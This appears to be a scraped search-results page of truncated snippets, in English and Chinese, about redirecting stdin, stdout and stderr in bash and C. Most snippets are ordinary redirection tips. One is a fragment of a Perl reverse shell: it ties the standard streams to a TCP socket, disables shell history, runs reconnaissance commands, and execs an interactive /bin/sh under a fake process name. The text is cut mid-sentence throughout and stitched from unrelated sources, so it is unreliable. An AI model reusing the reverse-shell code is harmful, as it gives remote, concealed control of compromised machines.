Before you flag this post as a duplicate (Shell: redirect stdout to /dev/null and stderr to stdout, or How to pipe stderr, and not stdout?, or IO Redirection - Swapping stdout and stderr) please give me a chance. So, I want something like this:#!/bin/bash temp_fu...
echo -e "\e[42;31m --- Redirect stdout and stderr to exclusive files ! ---\e[0m"; cat a* 2>stderr.txt 1>stdout.txt; echo -e "\e[1;32m'cat a* 2>stderr.txt 1>stdout.txt' executed and return value is: $? .\e[0m"; echo -e "\e[1;32mContents of stderr.txt is:...
首先,我们将stdout重定向到ls-output.txt文件,然后用2>&1的符号将文件描述符2stderr重定向到文件描述符1stdout中。 需要注意重定向的顺序,重定向stderr必须总是在重定向stdout之后发生。 最近版本的bash提供了第二种方法,该方法让执行这种组合重定向更精简。 代码语言:javascript 复制 ls-l/bin/usr&>ls-output....
/* redirect stdin, stdout, and stderr to /dev/null */ open("/dev/null", O_RDONLY); open("/dev/null", O_RDWR); open("/dev/null", O_RDWR); openlog(pname, LOG_PID, facility); //使用sylogd处理错误 return (0); /* success */ } 简洁版: #include <stdio.h> #include <stdl...
On many Linux systems,/dev/stdoutis an alias (link or similar) for file descriptor 1 of the current process. When you look at it from C, then the globalstdoutis connected to file descriptor 1. That meansis the same asecho foo 1>&1or a redirect of a file descriptor to itself. I ...
How to Use the Stdin, Stderr, and Stdout Streams in Bash – Linux Consultant[1] 引言 当Linux操作系统启动时,将会有三个流被打开。它们是stdin、stdout和stderr。 stdin的全称是标准输入,用于接受用户的输入。 stdout的完整形式是标准输出,用于将命令的输出存储到stdout流中。
错误重定向实际上应用于gzip命令,而不是/.a.out。您要查找的是./a.out 2> log.txt | gzip -c...
");60cgiexit();61}6263#Redirect STDIN, STDOUT and STDERR to the TCP connection64open(STDIN,">&SOCK");65open(STDOUT,">&SOCK");66open(STDERR,">&SOCK");67$ENV{'HISTFILE'} ='/dev/null';68system("w;uname -a;id;pwd");69exec({"/bin/sh"} ($fake_process_name,"-i"));7071#...
echo"Add console log file"cat << EOF | sudo tee -a /etc/cloud/cloud.cfg.d/05_logging.cfg# This tells cloud-init to redirect its stdout and stderr to# 'tee -a /var/log/cloud-init-output.log' so the user can see output# there without needing to look on the console.output: {al...
This redirect both stderr and stdout outputs to the file called mylogfile and let everything goes to stdout at the same time. It is used some stupid tricks : use exec without command to setup redirections, use tee to duplicates outputs, restart the script with the wanted redirections, use ...